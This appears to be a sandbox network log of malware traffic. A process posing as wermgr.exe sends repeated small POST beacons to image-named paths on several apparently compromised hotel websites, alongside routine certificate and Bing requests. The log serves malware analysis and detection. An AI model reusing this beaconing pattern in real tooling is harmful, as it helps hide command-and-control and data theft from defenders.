https://www.hardrockhoteldavos.com/wp-content/images/moka.gif

wermgr.exe

Remote address:

18.207.88.16:443

Request

POST /wp-content/images/moka.gif HTTP/1.1
Content-Type: multipart/form-data
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: www.hardrockhoteldavos.com
Content-Length: 668
Cache-Control: no-cache

Response

HTTP/1.1 302 Found

Server: nginx/1.10.3 (Ubuntu)
Date: Fri, 15 Mar 2024 21:40:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Location: https://www.hardrockhotels.com/davos/wp-content/images/moka.gif
Content-Security-Policy: upgrade-insecure-requests
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=63072000
DNS

www.hardrockhotels.com

wermgr.exe

Remote address:

8.8.8.8:53

Request

www.hardrockhotels.com

IN A

Response

www.hardrockhotels.com

IN CNAME

t.sni.global.fastly.net

t.sni.global.fastly.net

IN A

151.101.3.52

t.sni.global.fastly.net

IN A

151.101.67.52

t.sni.global.fastly.net

IN A

151.101.131.52

t.sni.global.fastly.net

IN A

151.101.195.52
GET

https://www.hardrockhotels.com/davos/wp-content/images/moka.gif

wermgr.exe

Remote address:

151.101.3.52:443

Request

GET /davos/wp-content/images/moka.gif HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Cache-Control: no-cache
Host: www.hardrockhotels.com
Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently

Connection: keep-alive
Content-Length: 182
Cache-Control: no-cache
Content-Type: text/html; charset=UTF-8
Location: https://hotel.hardrock.com/davos/wp-content/images/moka.gif
Server:
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Referrer-Policy: no-referrer-when-downgrade
Via: 1.1 varnish, 1.1 varnish
Accept-Ranges: bytes
Date: Fri, 15 Mar 2024 21:40:57 GMT
Age: 0
X-Served-By: cache-pdk-kpdk1780035-PDK, cache-lcy-eglc8600038-LCY
X-Cache: MISS, MISS
X-Cache-Hits: 0, 0
X-Timer: S1710538857.071885,VS0,VE381
Strict-Transport-Security: max-age=31557600
DNS

16.88.207.18.in-addr.arpa

Remote address:

8.8.8.8:53

Request

16.88.207.18.in-addr.arpa

IN PTR

Response

16.88.207.18.in-addr.arpa

IN PTR

ec2-18-207-88-16 compute-1 amazonawscom
DNS

crl.starfieldtech.com

wermgr.exe

Remote address:

8.8.8.8:53

Request

crl.starfieldtech.com

IN A

Response

crl.starfieldtech.com

IN CNAME

sfcrl.godaddy.com.akadns.net

sfcrl.godaddy.com.akadns.net

IN A

192.124.249.36

sfcrl.godaddy.com.akadns.net

IN A

192.124.249.41

sfcrl.godaddy.com.akadns.net

IN A

192.124.249.31
DNS

crl.starfieldtech.com

wermgr.exe

Remote address:

8.8.8.8:53

Request

crl.starfieldtech.com

IN A

Response

crl.starfieldtech.com

IN CNAME

sfcrl.godaddy.com.akadns.net

sfcrl.godaddy.com.akadns.net

IN A

192.124.249.36

sfcrl.godaddy.com.akadns.net

IN A

192.124.249.41

sfcrl.godaddy.com.akadns.net

IN A

192.124.249.31
GET

http://crl.starfieldtech.com/sfroot-g2.crl

wermgr.exe

Remote address:

192.124.249.36:80

Request

GET /sfroot-g2.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: crl.starfieldtech.com

Response

HTTP/1.1 200 OK

Server: Sucuri/Cloudproxy
Date: Fri, 15 Mar 2024 21:40:56 GMT
Content-Type: application/x-pkcs7-crl
Content-Length: 584
Connection: keep-alive
X-Sucuri-ID: 13036
Last-Modified: Thu, 05 Oct 2023 22:05:06 GMT
ETag: "248-606ff5111b68b"
Cache-Control: public, no-transform, must-revalidate
Expires: Sat, 07 Oct 2023 00:37:58 GMT
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
X-Sucuri-Cache: HIT
Accept-Ranges: bytes
DNS

ocsp.int-r1.certainly.com

wermgr.exe

Remote address:

8.8.8.8:53

Request

ocsp.int-r1.certainly.com

IN A

Response

ocsp.int-r1.certainly.com

IN CNAME

ocsp.certainly.map.fastly.net

ocsp.certainly.map.fastly.net

IN A

151.101.3.3

ocsp.certainly.map.fastly.net

IN A

151.101.67.3

ocsp.certainly.map.fastly.net

IN A

151.101.131.3

ocsp.certainly.map.fastly.net

IN A

151.101.195.3
GET

http://ocsp.int-r1.certainly.com/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQ9Cy058uESb%2B0ddJm5bqXlFvfbcAQUvZed36HYGyWZ4wwEBolkEtdlJMcCEncbeVVuf6QgJrWoBIXbzoV%2B3Q%3D%3D

wermgr.exe

Remote address:

151.101.3.3:80

Request

GET /MFMwUTBPME0wSzAJBgUrDgMCGgUABBQ9Cy058uESb%2B0ddJm5bqXlFvfbcAQUvZed36HYGyWZ4wwEBolkEtdlJMcCEncbeVVuf6QgJrWoBIXbzoV%2B3Q%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: ocsp.int-r1.certainly.com

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 522
Cache-Control: max-age=240689, public, no-transform, must-revalidate
Content-Type: application/ocsp-response
Edge-Cache-Tag: dd
Etag: "7CC93341DF2A8AC7C799E07AE1D56C3D5FB3526B379FA17DB0AD7DD20E8D98C3"
Expires: Mon, 18 Mar 2024 13:42:59 UTC
Last-Modified: Thu, 14 Mar 2024 13:43:00 UTC
Accept-Ranges: bytes
Date: Fri, 15 Mar 2024 21:40:56 GMT
Via: 1.1 varnish
Age: 10167
X-Served-By: cache-lcy-eglc8600038-LCY
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1710538857.714885,VS0,VE1
GET

http://ocsp.int-r1.certainly.com/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQ9Cy058uESb%2B0ddJm5bqXlFvfbcAQUvZed36HYGyWZ4wwEBolkEtdlJMcCEnd2YigN57LwySLgroIvX%2FsBZg%3D%3D

wermgr.exe

Remote address:

151.101.3.3:80

Request

GET /MFMwUTBPME0wSzAJBgUrDgMCGgUABBQ9Cy058uESb%2B0ddJm5bqXlFvfbcAQUvZed36HYGyWZ4wwEBolkEtdlJMcCEnd2YigN57LwySLgroIvX%2FsBZg%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: ocsp.int-r1.certainly.com

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 522
Cache-Control: max-age=302669, public, no-transform, must-revalidate
Content-Type: application/ocsp-response
Edge-Cache-Tag: 66
Etag: "B9F286B033407F5AB707FE210676C00C67CEC0566CE81CDD1ED8660D4FDFFA1F"
Expires: Tue, 19 Mar 2024 06:55:59 UTC
Last-Modified: Fri, 15 Mar 2024 06:56:00 UTC
Accept-Ranges: bytes
Date: Fri, 15 Mar 2024 21:40:57 GMT
Via: 1.1 varnish
Age: 10168
X-Served-By: cache-lcy-eglc8600038-LCY
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1710538858.791594,VS0,VE1
DNS

52.3.101.151.in-addr.arpa

Remote address:

8.8.8.8:53

Request

52.3.101.151.in-addr.arpa

IN PTR

Response
DNS

36.249.124.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

36.249.124.192.in-addr.arpa

IN PTR

Response

36.249.124.192.in-addr.arpa

IN PTR

cloudproxy10036sucurinet
DNS

3.3.101.151.in-addr.arpa

Remote address:

8.8.8.8:53

Request

3.3.101.151.in-addr.arpa

IN PTR

Response
DNS

hotel.hardrock.com

wermgr.exe

Remote address:

8.8.8.8:53

Request

hotel.hardrock.com

IN A

Response

hotel.hardrock.com

IN CNAME

t.sni.global.fastly.net

t.sni.global.fastly.net

IN A

151.101.3.52

t.sni.global.fastly.net

IN A

151.101.67.52

t.sni.global.fastly.net

IN A

151.101.131.52

t.sni.global.fastly.net

IN A

151.101.195.52
DNS

hotel.hardrock.com

wermgr.exe

Remote address:

8.8.8.8:53

Request

hotel.hardrock.com

IN A
GET

https://hotel.hardrock.com/davos/wp-content/images/moka.gif

wermgr.exe

Remote address:

151.101.3.52:443

Request

GET /davos/wp-content/images/moka.gif HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Cache-Control: no-cache
Connection: Keep-Alive
Host: hotel.hardrock.com

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 543323
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/10.0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Referrer-Policy: no-referrer-when-downgrade
Via: 1.1 varnish, 1.1 varnish
Accept-Ranges: bytes
Date: Fri, 15 Mar 2024 21:40:58 GMT
Age: 0
X-Served-By: cache-pdk-katl1840060-PDK, cache-lcy-eglc8600062-LCY
X-Cache: MISS, MISS
X-Cache-Hits: 0, 0
X-Timer: S1710538858.887780,VS0,VE614
Vary: Accept-Encoding
Strict-Transport-Security: max-age=31557600
DNS

www.belvedere-locarno.com

wermgr.exe

Remote address:

8.8.8.8:53

Request

www.belvedere-locarno.com

IN A

Response

www.belvedere-locarno.com

IN A

172.67.68.116

www.belvedere-locarno.com

IN A

104.26.6.206

www.belvedere-locarno.com

IN A

104.26.7.206
DNS

www.belvedere-locarno.com

wermgr.exe

Remote address:

8.8.8.8:53

Request

www.belvedere-locarno.com

IN A

Response

www.belvedere-locarno.com

IN A

104.26.7.206

www.belvedere-locarno.com

IN A

104.26.6.206

www.belvedere-locarno.com

IN A

172.67.68.116
POST

https://www.belvedere-locarno.com/includes/image/rueses.bmp

wermgr.exe

Remote address:

172.67.68.116:443

Request

POST /includes/image/rueses.bmp HTTP/1.1
Content-Type: multipart/form-data
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: www.belvedere-locarno.com
Content-Length: 668
Cache-Control: no-cache

Response

HTTP/1.1 404 Not Found

Date: Fri, 15 Mar 2024 21:40:59 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: private
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ca91te8%2BhCpWZFuStdPPkTz998sSwUU1x2fXkU6uylBhXKr8b%2Bgc2xxRJc%2B4WANjunvEqg1gE66a%2BfA1l2cgiIuRJu5exDnScLTc%2FlzDD6zwTgoJqnNanfr7KZPZO4uczUXr%2BmOLLt437VQ%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 864faa3cf82f7714-LHR
DNS

x2.c.lencr.org

wermgr.exe

Remote address:

8.8.8.8:53

Request

x2.c.lencr.org

IN A

Response

x2.c.lencr.org

IN CNAME

crl.root-x1.letsencrypt.org.edgekey.net

crl.root-x1.letsencrypt.org.edgekey.net

IN CNAME

e8652.dscx.akamaiedge.net

e8652.dscx.akamaiedge.net

IN A

173.222.13.40
DNS

x2.c.lencr.org

wermgr.exe

Remote address:

8.8.8.8:53

Request

x2.c.lencr.org

IN A
GET

http://x2.c.lencr.org/

wermgr.exe

Remote address:

173.222.13.40:80

Request

GET / HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: x2.c.lencr.org

Response

HTTP/1.1 200 OK

Server: nginx
Content-Type: application/pkix-crl
Last-Modified: Mon, 12 Feb 2024 22:07:27 GMT
ETag: "65ca969f-12b"
Cache-Control: max-age=3600
Expires: Fri, 15 Mar 2024 22:40:58 GMT
Date: Fri, 15 Mar 2024 21:40:58 GMT
Content-Length: 299
Connection: keep-alive
DNS

www.hotelfarinet.com

wermgr.exe

Remote address:

8.8.8.8:53

Request

www.hotelfarinet.com

IN A

Response

www.hotelfarinet.com

IN A

18.132.18.63
POST

https://www.hotelfarinet.com/static/pics/hemerufu.gif

wermgr.exe

Remote address:

18.132.18.63:443

Request

POST /static/pics/hemerufu.gif HTTP/1.1
Content-Type: multipart/form-data
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: www.hotelfarinet.com
Content-Length: 668
Cache-Control: no-cache

Response

HTTP/1.1 404 Not Found

Server: nginx
Date: Fri, 15 Mar 2024 21:40:59 GMT
Content-Type: text/html
Content-Length: 808
Connection: keep-alive
Last-Modified: Thu, 06 Oct 2022 09:58:24 GMT
ETag: "328-5ea5abbeb88fc"
Accept-Ranges: bytes
DNS

116.68.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

116.68.67.172.in-addr.arpa

IN PTR

Response
DNS

www.hrk-ramoz.com

wermgr.exe

Remote address:

8.8.8.8:53

Request

www.hrk-ramoz.com

IN A

Response

www.hrk-ramoz.com

IN A

156.235.147.122
DNS

www.hrk-ramoz.com

wermgr.exe

Remote address:

8.8.8.8:53

Request

www.hrk-ramoz.com

IN A

Response

www.hrk-ramoz.com

IN A

156.235.147.122
DNS

63.18.132.18.in-addr.arpa

Remote address:

8.8.8.8:53

Request

63.18.132.18.in-addr.arpa

IN PTR

Response

63.18.132.18.in-addr.arpa

IN PTR

ec2-18-132-18-63 eu-west-2compute amazonawscom
DNS

www.morcote-residenza.com

wermgr.exe

Remote address:

8.8.8.8:53

Request

www.morcote-residenza.com

IN A

Response

www.morcote-residenza.com

IN A

194.191.24.37
DNS

www.morcote-residenza.com

wermgr.exe

Remote address:

8.8.8.8:53

Request

www.morcote-residenza.com

IN A

Response

www.morcote-residenza.com

IN A

194.191.24.37
POST

https://www.morcote-residenza.com/static/pics/hefu.png

wermgr.exe

Remote address:

194.191.24.37:443

Request

POST /static/pics/hefu.png HTTP/1.1
Content-Type: multipart/form-data
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: www.morcote-residenza.com
Content-Length: 668
Cache-Control: no-cache

Response

HTTP/1.1 404 Not Found

Server: nginx
Date: Fri, 15 Mar 2024 21:41:04 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Link: <https://morcote-residenza.com/wp-json/>; rel="https://api.w.org/"
Vary: Host
DNS

37.24.191.194.in-addr.arpa

Remote address:

8.8.8.8:53

Request

37.24.191.194.in-addr.arpa

IN PTR

Response

37.24.191.194.in-addr.arpa

IN PTR

web27 servicehosterch
DNS

37.24.191.194.in-addr.arpa

Remote address:

8.8.8.8:53

Request

37.24.191.194.in-addr.arpa

IN PTR

Response

37.24.191.194.in-addr.arpa

IN PTR

web27 servicehosterch
DNS

www.seitensprungzimmer24.com

wermgr.exe

Remote address:

8.8.8.8:53

Request

www.seitensprungzimmer24.com

IN A

Response

www.seitensprungzimmer24.com

IN A

136.243.162.140
DNS

www.seitensprungzimmer24.com

wermgr.exe

Remote address:

8.8.8.8:53

Request

www.seitensprungzimmer24.com

IN A

Response

www.seitensprungzimmer24.com

IN A

136.243.162.140
POST

https://www.seitensprungzimmer24.com/news/images/thkamo.bmp

wermgr.exe

Remote address:

136.243.162.140:443

Request

POST /news/images/thkamo.bmp HTTP/1.1
Content-Type: multipart/form-data
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: www.seitensprungzimmer24.com
Content-Length: 668
Cache-Control: no-cache

Response

HTTP/1.1 301 Moved Permanently

Date: Fri, 15 Mar 2024 21:41:04 GMT
Server: Apache
X-Redirect-By: WordPress
Upgrade: h2
Connection: Upgrade
Location: https://seitensprungzimmer24.com/news/images/thkamo.bmp
Referrer-Policy: no-referrer-when-downgrade
Content-Length: 0
Content-Type: text/html; charset=utf-8
DNS

seitensprungzimmer24.com

wermgr.exe

Remote address:

8.8.8.8:53

Request

seitensprungzimmer24.com

IN A

Response

seitensprungzimmer24.com

IN A

136.243.162.140
DNS

seitensprungzimmer24.com

wermgr.exe

Remote address:

8.8.8.8:53

Request

seitensprungzimmer24.com

IN A

Response

seitensprungzimmer24.com

IN A

136.243.162.140
GET

https://seitensprungzimmer24.com/news/images/thkamo.bmp

wermgr.exe

Remote address:

136.243.162.140:443

Request

GET /news/images/thkamo.bmp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Cache-Control: no-cache
Host: seitensprungzimmer24.com
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

Date: Fri, 15 Mar 2024 21:41:05 GMT
Server: Apache
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Link: <https://seitensprungzimmer24.com/wp-json/>; rel="https://api.w.org/"
Upgrade: h2
Connection: Upgrade, Keep-Alive
Referrer-Policy: no-referrer-when-downgrade
Keep-Alive: timeout=15, max=100
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
DNS

140.162.243.136.in-addr.arpa

Remote address:

8.8.8.8:53

Request

140.162.243.136.in-addr.arpa

IN PTR

Response

140.162.243.136.in-addr.arpa

IN PTR

www425your-serverde
DNS

www.arbezie-hotel.com

wermgr.exe

Remote address:

8.8.8.8:53

Request

www.arbezie-hotel.com

IN A

Response

www.arbezie-hotel.com

IN A

213.186.33.5
DNS

5.33.186.213.in-addr.arpa

Remote address:

8.8.8.8:53

Request

5.33.186.213.in-addr.arpa

IN PTR

Response

5.33.186.213.in-addr.arpa

IN PTR

redirectovhnet
DNS

240.221.184.93.in-addr.arpa

Remote address:

8.8.8.8:53

Request

240.221.184.93.in-addr.arpa

IN PTR

Response
DNS

13.227.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

13.227.111.52.in-addr.arpa

IN PTR

Response
DNS

www.aubergemontblanc.com

wermgr.exe

Remote address:

8.8.8.8:53

Request

www.aubergemontblanc.com

IN A

Response

www.aubergemontblanc.com

IN A

83.166.138.13
DNS

www.aubergemontblanc.com

wermgr.exe

Remote address:

8.8.8.8:53

Request

www.aubergemontblanc.com

IN A

Response

www.aubergemontblanc.com

IN A

83.166.138.13
POST

https://www.aubergemontblanc.com/uploads/pics/thzuth.bmp

wermgr.exe

Remote address:

83.166.138.13:443

Request

POST /uploads/pics/thzuth.bmp HTTP/1.1
Content-Type: multipart/form-data
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: www.aubergemontblanc.com
Content-Length: 668
Cache-Control: no-cache

Response

HTTP/1.1 404 Not Found

date: Fri, 15 Mar 2024 21:41:15 GMT
server: Apache
expires: Wed, 11 Jan 1984 05:00:00 GMT
cache-control: no-cache, must-revalidate, max-age=0
link: <https://www.aubergemontblanc.com/wp-json/>; rel="https://api.w.org/"
strict-transport-security: max-age=16000000
upgrade: h2
connection: Upgrade
transfer-encoding: chunked
content-type: text/html; charset=UTF-8
DNS

13.138.166.83.in-addr.arpa

Remote address:

8.8.8.8:53

Request

13.138.166.83.in-addr.arpa

IN PTR

Response

13.138.166.83.in-addr.arpa

IN PTR

h2web67 infomaniakch
DNS

13.138.166.83.in-addr.arpa

Remote address:

8.8.8.8:53

Request

13.138.166.83.in-addr.arpa

IN PTR

Response

13.138.166.83.in-addr.arpa

IN PTR

h2web67 infomaniakch
DNS

www.torhotel.com

wermgr.exe

Remote address:

8.8.8.8:53

Request

www.torhotel.com

IN A

Response

www.torhotel.com

IN A

128.65.195.228
DNS

www.torhotel.com

wermgr.exe

Remote address:

8.8.8.8:53

Request

www.torhotel.com

IN A

Response

www.torhotel.com

IN A

128.65.195.228
POST

https://www.torhotel.com/data/assets/meruseam.jpg

wermgr.exe

Remote address:

128.65.195.228:443

Request

POST /data/assets/meruseam.jpg HTTP/1.1
Content-Type: multipart/form-data
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: www.torhotel.com
Content-Length: 668
Cache-Control: no-cache

Response

HTTP/1.1 404 Not Found

date: Fri, 15 Mar 2024 21:41:18 GMT
server: Apache
expires: Wed, 11 Jan 1984 05:00:00 GMT
cache-control: no-cache, must-revalidate, max-age=0
link: <https://www.torhotel.com/wp-json/>; rel="https://api.w.org/"
strict-transport-security: max-age=16000000
upgrade: h2
connection: Upgrade
transfer-encoding: chunked
content-type: text/html; charset=UTF-8
DNS

228.195.65.128.in-addr.arpa

Remote address:

8.8.8.8:53

Request

228.195.65.128.in-addr.arpa

IN PTR

Response

228.195.65.128.in-addr.arpa

IN PTR

h2web208 infomaniakch
DNS

228.195.65.128.in-addr.arpa

Remote address:

8.8.8.8:53

Request

228.195.65.128.in-addr.arpa

IN PTR

Response

228.195.65.128.in-addr.arpa

IN PTR

h2web208 infomaniakch
DNS

www.alpenlodge.com

wermgr.exe

Remote address:

8.8.8.8:53

Request

www.alpenlodge.com

IN A

Response

www.alpenlodge.com

IN A

217.26.55.76
DNS

www.alpenlodge.com

wermgr.exe

Remote address:

8.8.8.8:53

Request

www.alpenlodge.com

IN A

Response

www.alpenlodge.com

IN A

217.26.55.76
POST

https://www.alpenlodge.com/wp-content/pictures/ruimammoso.jpg

wermgr.exe

Remote address:

217.26.55.76:443

Request

POST /wp-content/pictures/ruimammoso.jpg HTTP/1.1
Content-Type: multipart/form-data
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: www.alpenlodge.com
Content-Length: 668
Cache-Control: no-cache

Response

HTTP/1.1 404 Not Found

Date: Fri, 15 Mar 2024 21:41:21 GMT
Server: Apache
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Link: <https://alpenlodge.com/wp-json/>; rel="https://api.w.org/"
Upgrade: h2,h2c
Connection: Upgrade
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
DNS

76.55.26.217.in-addr.arpa

Remote address:

8.8.8.8:53

Request

76.55.26.217.in-addr.arpa

IN PTR

Response

76.55.26.217.in-addr.arpa

IN PTR

sl294web hostpointch
DNS

76.55.26.217.in-addr.arpa

Remote address:

8.8.8.8:53

Request

76.55.26.217.in-addr.arpa

IN PTR
DNS

www.aparthotelzurich.com

wermgr.exe

Remote address:

8.8.8.8:53

Request

www.aparthotelzurich.com

IN A

Response

www.aparthotelzurich.com

IN CNAME

aparthotelzurich.com

aparthotelzurich.com

IN A

15.197.142.173

aparthotelzurich.com

IN A

3.33.152.147
DNS

205.47.74.20.in-addr.arpa

wermgr.exe

Remote address:

8.8.8.8:53

Request

205.47.74.20.in-addr.arpa

IN PTR

Response
DNS

205.47.74.20.in-addr.arpa

wermgr.exe

Remote address:

8.8.8.8:53

Request

205.47.74.20.in-addr.arpa

IN PTR

Response
DNS

tse1.mm.bing.net

Remote address:

8.8.8.8:53

Request

tse1.mm.bing.net

IN A

Response

tse1.mm.bing.net

IN CNAME

mm-mm.bing.net.trafficmanager.net

mm-mm.bing.net.trafficmanager.net

IN CNAME

dual-a-0001.a-msedge.net

dual-a-0001.a-msedge.net

IN A

204.79.197.200

dual-a-0001.a-msedge.net

IN A

13.107.21.200
DNS

tse1.mm.bing.net

Remote address:

8.8.8.8:53

Request

tse1.mm.bing.net

IN A

Response

tse1.mm.bing.net

IN CNAME

mm-mm.bing.net.trafficmanager.net

mm-mm.bing.net.trafficmanager.net

IN CNAME

dual-a-0001.a-msedge.net

dual-a-0001.a-msedge.net

IN A

204.79.197.200

dual-a-0001.a-msedge.net

IN A

13.107.21.200
GET

https://tse1.mm.bing.net/th?id=OADD2.10239340418570_1AILBHE008ZL9RHPC&pid=21.2&w=1080&h=1920&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239340418570_1AILBHE008ZL9RHPC&pid=21.2&w=1080&h=1920&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 233452
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 7C3623E7E50B499D9F4769ACCFF3E857 Ref B: LON04EDGE0821 Ref C: 2024-03-15T21:41:24Z
date: Fri, 15 Mar 2024 21:41:23 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239339388209_1UI7TWFL2FR2S3CP9&pid=21.2&w=1080&h=1920&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239339388209_1UI7TWFL2FR2S3CP9&pid=21.2&w=1080&h=1920&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 457945
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: A1561035575940798C0A5C64EFE30693 Ref B: LON04EDGE0821 Ref C: 2024-03-15T21:41:24Z
date: Fri, 15 Mar 2024 21:41:23 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239339388208_1P9RJKIJ8V43BR17K&pid=21.2&w=1920&h=1080&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239339388208_1P9RJKIJ8V43BR17K&pid=21.2&w=1920&h=1080&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 371912
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: E90437F7A7574F3EB0A6325DA4426946 Ref B: LON04EDGE0821 Ref C: 2024-03-15T21:41:24Z
date: Fri, 15 Mar 2024 21:41:23 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239340418569_13408TD3CSPQQLS8W&pid=21.2&w=1920&h=1080&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239340418569_13408TD3CSPQQLS8W&pid=21.2&w=1920&h=1080&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 445169
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 26FCBA6C2FC748959139B4053FEBCFA2 Ref B: LON04EDGE0821 Ref C: 2024-03-15T21:41:24Z
date: Fri, 15 Mar 2024 21:41:23 GMT
GET

